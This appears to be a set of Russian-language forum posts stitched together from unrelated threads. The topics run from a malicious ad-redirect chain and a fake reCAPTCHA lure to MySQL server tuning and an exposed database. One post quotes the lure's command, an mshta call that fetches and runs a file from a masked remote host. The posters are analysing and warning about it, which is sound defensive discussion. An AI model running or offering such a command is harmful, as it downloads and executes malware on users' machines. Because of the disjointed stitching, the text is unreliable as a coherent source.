А вот и распротранитель.
Далее цепочка: tofuturepubs.com
А потом http://a.exdynsrv.com/popunder1000.js
Как ты понял, что хочет ТС? 😲 😲 😲
опыт общения с заказчиками, вполне внятное ТЗ 😁
document.addEventListener("DOMContentLoaded", function(event) {
document.title=document.title+" SMILE";
});
Темы все стали платными на этом форуме, а если не заплатишь, что тему скрывают и никто её не видит.
Нашёл статью: Minimizing Malicious Script Execution
Там не только про mshta, но и про другие внутренние программки и как защититься от этого.
mshta https://*****.click/riii2-b.accdb # ✅ ''I am not a robot - reCAPTCHA Verification ID: 2165
Дыру в IE используют. Забавно, что у меня отключён компонент IE, а mshta открывается IE в отдельном окне всё равно.
Хотя там даже не уязвимости, MSHTA там VB скрипты можно исполнять. Но да, это уже напоминает "молдавский вирус".
Тоже видел сегодня такую, редирект на какой-то площадке был.
Но не обратил внимание, что там писано было. Так, а что в буфер кидается, не сохранили?
Ну так надо выяснять причины, и почему 7 ГБ он пожирает и что делается.
Тут до изменения net.core.somaxconn далеко вообще.
В какой дурной онлайн-школе вас такому учат только?!
Вчера тут скидывали скрипт, для ответа через AI-шку... вижу тут её активно юзают 🤣
p.s. что за набор слов...
Это не на форуме нужно спрашивать, а смотреть на сервере, исходя из возможного потребления RAM мускулом и доступного.
Не правильный ответ.
Нужны вводные, перед тем как что-то вообще делать.
1. Что вообще на сервере происходит, под что он создан?
2. MySQL случаем не во внешний мир смотрит? А вот это user: 'unauthenticated' очень настораживает.
Ну круто, теперь тем кто подбирает пароли, легче это делать, в лимит не упираются. Удобненько.